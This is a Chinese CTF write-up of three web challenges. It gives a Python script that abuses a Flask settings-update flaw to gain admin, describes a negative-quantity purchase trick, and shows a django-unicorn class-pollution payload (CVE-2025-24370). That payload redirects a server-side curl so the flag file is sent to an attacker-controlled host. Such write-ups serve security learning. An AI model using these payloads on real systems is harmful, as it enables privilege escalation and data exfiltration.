复现平台:https://gz.imxbt.cn/games/27/challenges#

WorkerDB

注册和登录功能点/api/login 和 /api/register

随便注册进去看看 发现role是admin结合题目描述那我们目的就是成为admin 并且已知这个题是session进行role验证

这个题我尝试了flask-unsign爆破是不行的 那jwt这条路行不通

于是尝试dirsearch 扫描出/admin路径 访问提示我Access denied,登陆进去有change attribute功能点 抓包抓到一个新路由/api/settings/update

源码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
from flask import Flask, redirect, render_template, request, jsonify, session, url_for
from multiprocessing import Lock
from functools import wraps
import secrets
import sqlite3
import json
import os

app = Flask(__name__)
app.secret_key = secrets.token_hex(16)

ALLOWED_ATTRIBUTES = {
'role', 'email', 'display_name', 'theme', 'language', 'notifications',
'timezone', 'avatar', 'bio', 'website', 'location'
}

def init_db():
conn = sqlite3.connect('database.db')
c = conn.cursor()

c.execute('''
CREATE TABLE IF NOT EXISTS users (
id INTEGER PRIMARY KEY AUTOINCREMENT,
username TEXT UNIQUE NOT NULL,
password TEXT NOT NULL,
attributes TEXT NOT NULL
)
''')

c.execute('SELECT id FROM users WHERE username = ?', ('admin',))
if not c.fetchone():
admin_attrs = json.dumps({
'role': 'admin',
'email': 'admin@example.com',
'display_name': 'Administrator'
})
admin_password = secrets.token_hex(16)
c.execute('INSERT INTO users (username, password, attributes) VALUES (?, ?, ?)',
('admin', admin_password, admin_attrs))
print("created admin account with password:", admin_password)

conn.commit()
conn.close()

def get_db():
conn = sqlite3.connect('database.db')
conn.row_factory = sqlite3.Row
return conn

l = Lock()
def requires_auth(f):
@wraps(f)
def decorated(*args, **kwargs):
if 'user_id' not in session:
return jsonify({"error": "Authentication required"}), 401
with l:
return f(*args, **kwargs)
return decorated

def has_xss(value):
if not isinstance(value, str):
return False
return any(c in value for c in ['<', '>', '"', "'", '(', ')', '{', '}', '='])

@app.route('/api/register', methods=['POST'])
def api_register():
try:
data = request.get_json()
if not data:
return jsonify({"error": "Invalid request"}), 400

username = data.get('username')
password = data.get('password')

if not username or not password:
return jsonify({"error": "Invalid credentials"}), 400

db = get_db()
cursor = db.cursor()

cursor.execute('SELECT id FROM users WHERE username = ?', (username,))
if cursor.fetchone():
db.close()
return jsonify({"error": "Username already exists"}), 400

attributes = json.dumps({
'role': 'user',
'email': '',
'display_name': username,
'theme': 'light'
})

cursor.execute('INSERT INTO users (username, password, attributes) VALUES (?, ?, ?)',
(username, password, attributes))

db.commit()
db.close()
return jsonify({"message": "Registration successful"})

except sqlite3.Error:
return jsonify({"error": "Server error"}), 500

@app.route('/api/login', methods=['POST'])
def api_login():
try:
data = request.get_json()
if not data:
return jsonify({"error": "Invalid request"}), 400

username = data.get('username')
password = data.get('password')

if not username or not password:
return jsonify({"error": "Invalid credentials"}), 400

db = get_db()
cursor = db.cursor()

cursor.execute('SELECT id, attributes FROM users WHERE username = ? AND password = ?',
(username, password))

user = cursor.fetchone()
db.close()

if user:
attrs = json.loads(user['attributes'])
session['user_id'] = user['id']
session['role'] = attrs.get('role')
return jsonify({"message": "Login successful"})

return jsonify({"error": "Invalid credentials"}), 401

except sqlite3.Error:
return jsonify({"error": "Server error"}), 500

@app.route('/api/settings/update', methods=['POST'])
@requires_auth
def update_settings():
try:
user_id = session['user_id']
new_attrs = request.get_json()

if not new_attrs:
return jsonify({"error": "Invalid input"}), 400

db = get_db()
cursor = db.cursor()

cursor.execute('SELECT attributes FROM users WHERE id = ?', (user_id,))
current_attrs = json.loads(cursor.fetchone()['attributes'])

temp_attrs = current_attrs.copy()
for key in new_attrs:
if key in current_attrs:
temp_attrs[key] = None

cursor.execute('UPDATE users SET attributes = ? WHERE id = ?',
(json.dumps(temp_attrs), user_id))
db.commit()

sanitized_attrs = {}
for key, value in new_attrs.items():
if key in ALLOWED_ATTRIBUTES:
if not has_xss(value):
sanitized_attrs[key] = value

cursor.execute('SELECT attributes FROM users WHERE id = ?', (user_id,))
current_attrs = json.loads(cursor.fetchone()['attributes'])

final_attrs = current_attrs.copy()
for key, value in sanitized_attrs.items():
final_attrs[key] = value
final_attrs['role'] = 'user'

cursor.execute('UPDATE users SET attributes = ? WHERE id = ?',
(json.dumps(final_attrs), user_id))
db.commit()
db.close()

return jsonify({"message": "Settings updated successfully"})

except sqlite3.Error:
return jsonify({"error": "Server error"}), 500

@app.route('/api/manage/permissions', methods=['POST'])
@requires_auth
def manage_permissions():
try:
user_id = session['user_id']
data = request.get_json()

if not data or 'target_user' not in data or 'new_role' not in data:
return jsonify({"error": "Missing required fields"}), 400

target_username = data['target_user']
new_role = data['new_role']

db = get_db()
cursor = db.cursor()

cursor.execute('SELECT attributes FROM users WHERE id = ?', (user_id,))
user_data = cursor.fetchone()
current_user_attrs = json.loads(user_data['attributes'])

if current_user_attrs.get('role') != 'user':
cursor.execute('SELECT id, attributes FROM users WHERE username = ?', (target_username,))
target_user = cursor.fetchone()

if not target_user:
db.close()
return jsonify({"error": "Target user not found"}), 404

target_attrs = json.loads(target_user['attributes'])
target_attrs['role'] = new_role

cursor.execute('UPDATE users SET attributes = ? WHERE username = ?',
(json.dumps(target_attrs), target_username))

db.commit()
db.close()
return jsonify({"message": "Permissions updated successfully"})

db.close()
return jsonify({"error": "Access denied"}), 403

except sqlite3.Error:
return jsonify({"error": "Server error"}), 500

@app.route('/api/admin', methods=['GET'])
@requires_auth
def admin_panel():
try:
user_id = session['user_id']

db = get_db()
cursor = db.cursor()
cursor.execute('SELECT attributes FROM users WHERE id = ?', (user_id,))

user_data = cursor.fetchone()
db.close()

attrs = json.loads(user_data['attributes'])

if attrs.get('role') == 'admin':
return jsonify({
"message": "Welcome to the admin panel",
"flag": os.getenv("FLAG", "cube{example_flag}")
})

return jsonify({"error": "Access denied"}), 403

except sqlite3.Error:
return jsonify({"error": "Server error"}), 500

@app.get("/admin")
def admin():
if session.get("user_id"):
return render_template("admin.html")
return redirect(url_for("index"))

@app.get("/login")
def login():
return render_template("login.html")

@app.get("/register")
def register():
return render_template("register.html")

@app.get("/")
def index():
if session.get("user_id"):
db = get_db()
cursor = db.cursor()
cursor.execute('SELECT username, attributes FROM users WHERE id = ?',
(session["user_id"],))
user = cursor.fetchone()
db.close()
return render_template("home.html", user=user[0], attributes=json.loads(user[1]), allowed_attrs=ALLOWED_ATTRIBUTES)
return render_template("index.html")

init_db()

最主要是/api/settings/update 这里有可以利用的的东西

接口先提交清空字段的数据库更新,再处理并校验输入,当输入类型异常导致后续逻辑中断时,敏感字段(如 role)被永久清空而未恢复,触发权限检查逻辑缺陷。所以当我们传入[“role”] 就成功设置role为none

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
@app.route('/api/settings/update', methods=['POST'])
@requires_auth
def update_settings():
try:
user_id = session['user_id']
new_attrs = request.get_json()
if not new_attrs:
return jsonify({"error": "Invalid input"}), 400
db = get_db()
cursor = db.cursor()
cursor.execute('SELECT attributes FROM users WHERE id = ?', (user_id,))
current_attrs = json.loads(cursor.fetchone()['attributes'])
temp_attrs = current_attrs.copy()
for key in new_attrs:
if key in current_attrs:
temp_attrs[key] = None
cursor.execute('UPDATE users SET attributes = ? WHERE id = ?',
(json.dumps(temp_attrs), user_id))
db.commit()
sanitized_attrs = {}
for key, value in new_attrs.items():
if key in ALLOWED_ATTRIBUTES:
if not has_xss(value):
sanitized_attrs[key] = value
cursor.execute('SELECT attributes FROM users WHERE id = ?', (user_id,))
current_attrs = json.loads(cursor.fetchone()['attributes'])
final_attrs = current_attrs.copy()
for key, value in sanitized_attrs.items():
final_attrs[key] = value
final_attrs['role'] = 'user'
cursor.execute('UPDATE users SET attributes = ? WHERE id = ?',
(json.dumps(final_attrs), user_id))
db.commit()
db.close()
return jsonify({"message": "Settings updated successfully"})
except sqlite3.Error:
return jsonify({"error": "Server error"}), 500

因为/api/manage/permissions只校验是不是为user 不是user就通过 我们none 所以可以通过伪造admin

1
2
3
if current_user_attrs.get('role') != 'user':
cursor.execute('SELECT id, attributes FROM users WHERE username = ?', (target_username,))
target_user = cursor.fetchone()

于是脚本是:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import requests

BASE = "http://gz.imxbt.cn:20580/"
s = requests.Session()

s.post(BASE + "/api/register", json={
"username": "sauy",
"password": "122"
})

s.post(BASE + "/api/login", json={
"username": "sauy",
"password": "122"
})

r = s.post(
BASE + "/api/settings/update",
json=["role"],
headers={"Content-Type": "application/json"}
)
print("Step 3 status:", r.status_code)

r = s.post(BASE + "/api/manage/permissions", json={
"target_user": "sauy",
"new_role": "admin"
})
print("Step 4 promote:", r.status_code, r.json())

r = s.get(BASE + "/api/admin")
print("Step 5 flag:", r.status_code, r.json())

题目描述(中文版)

我们找到了这个合法的网站,它正在销售与黑客相关的零食,但它们的一款产品定价奇怪。找出一种方法在不支付的情况下购买它。

进去就是一个类似于购物网站的东西 往下看看的个价格很离谱的东西 肯定就是要买它 余额只有100

那就想办法能不能把购买数量改为负数 前端直接改不行 抓个包看看呢

image-20250723210815667

image-20250723210829218

成功 那就凑到不超过100就行了 满足要求后购买 卡号要求16位全数字

todo

其他的我不啰嗦了 前面的也就是输入字符限制20个字符 抓包看个传入格式为

1
{"id":"7jqvVCJD","data":{"task":"","tasks":[]},"checksum":"Scdr22XG","actionQueue":[{"type":"syncInput","payload":{"name":"task","value":"test1"},"partials":[]},{"type":"callMethod","payload":{"name":"add"},"partials":[]}],"epoch":1753276792384,"hash":"3667ovLi"}

本题可知是django框架 考点是CVE-2025-24370

https://github.com/adamghill/django-unicorn/security/advisories/GHSA-g9wf-5777-gq43

附件里面很重要的源码

如果攻击者能够修改 settings.CONTACT_URL(例如通过序列化注入、配置修改、数据库注入等),就能将 curl 的目标指向攻击者自己的服务器。

1
2
3
4
5
def home(request):
# todo charge users $49.99/month because greed
# todo dont send the confidential flag ...
system(f'curl {settings.CONTACT_URL} -d @/tmp/flag.txt -X GET -o /dev/null')
return render(request, f'index.html')

poc是

1
2
3
4
5
6
{
"type": "syncInput",
"payload": {
"name": "__init__.__globals__.sys.modules.django.template.backends.django.settings.CONTACT_URL",
"value": "http://your-ip:port"
}

最后发包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
POST /unicorn/message/todo HTTP/1.1
Host: gz.imxbt.cn:20622
Content-Length: 691
Accept: application/json
X-Requested-With: XMLHttpRequest
X-CSRFTOKEN: OaW6pVSwc7zWaWovIsxPogO3TESlFCY0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.5304.88 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Origin: http://gz.imxbt.cn:20622
Referer: http://gz.imxbt.cn:20622/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: csrftoken=OaW6pVSwc7zWaWovIsxPogO3TESlFCY0
Connection: close

{
"id": "n6m7PYbo",
"data": {
"task": "",
"tasks": []
},
"checksum": "PXafcTdS",
"actionQueue": [
{
"type": "syncInput",
"payload": {
"name": "task",
"value": "12"
},
"partials": []
},
{
"type": "syncInput",
"payload": {
"name": "__init__.__globals__.sys.modules.django.template.backends.django.settings.CONTACT_URL",
"value": "http://123:123"
},
"partials": []
},
{
"type": "callMethod",
"payload": {
"name": "add"
},
"partials": []
}
],
"epoch": 1753284343529,
"hash": "djXgQjG4"
}

先服务器开始监听 然后发包 再去网页刷新就可以拿到flag了

image-20250723234039841